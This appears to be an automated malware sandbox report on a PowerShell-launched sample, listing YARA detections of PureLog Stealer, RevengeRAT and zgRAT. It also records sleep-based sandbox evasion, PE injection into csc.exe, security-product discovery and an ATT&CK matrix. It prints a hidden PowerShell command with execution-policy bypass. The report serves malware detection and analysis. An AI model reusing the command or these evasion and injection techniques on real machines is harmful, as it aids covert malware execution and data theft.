                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6D10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4762Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5117Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 3592Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 6244Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4367Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5377Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5037
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4781
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7928Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7932Thread sleep count: 3592 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7932Thread sleep count: 6244 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2004Thread sleep count: 4367 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep count: 5377 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1780Thread sleep count: 5037 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 4781 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                    Source: powershell.exe, 00000000.00000002.1896657136.000001C2CE012000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWeP
                    Source: csc.exe, 00000002.00000003.2148821941.00000000052D3000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115682568.00000000052D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="@
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: stage2.ps1, type: SAMPLE
                    Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E00008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4CBF008Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 402000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 406000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 408000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4900008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\PDF\PDF2.ps1"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Source: csc.exe, 00000002.00000002.4116375776.000000000721B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007211000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\^q
                    Source: csc.exe, 00000002.00000002.4116375776.000000000721B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007211000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4116375776.0000000007221000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: csc.exe, 00000002.00000003.2148821941.0000000005296000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4115682568.0000000005297000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RevengeRAT
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Found RAT behaviour (information extraction to be send to C&C)
                    Source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, IdGenerator.cs.Net Code: Dns.GetHostByName(Dns.GetHostName()) new ManagementObjectSearcher("select * from Win32_Processor").Get().GetEnumerator() Registry.GetValue("HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\SYSTEM\\CENTRALPROCESSOR\\0", "ProcessorNameString", null)

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1883635223.000001C2C68BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RevengeRAT
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2b7b97990.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4115369632.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2076815296.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.0000000007242000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2001377795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4116375776.00000000071E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1860455437.000001C2B7B84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3020, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 3156, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2ce4e0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.powershell.exe.1c2c6965ce0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1897758677.000001C2CE4E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts21
                    Windows Management Instrumentation                    		1
                    Scripting                    		212
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping31
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    PowerShell                    		11
                    Registry Run Keys / Startup Folder                    		11
                    Registry Run Keys / Startup Folder                    		1
                    Disable or Modify Tools                    		LSASS Memory2
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
